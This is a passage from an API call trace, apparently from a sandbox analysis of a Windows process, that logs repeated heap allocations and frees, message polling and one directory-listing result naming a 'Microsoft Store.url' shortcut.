hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0198.256] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0198.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0198.277] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0198.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0198.277] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0198.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.279] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.282] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0198.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0198.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.284] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0198.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0198.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0198.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0198.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0198.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0198.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0198.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0198.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0198.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0198.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0198.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: 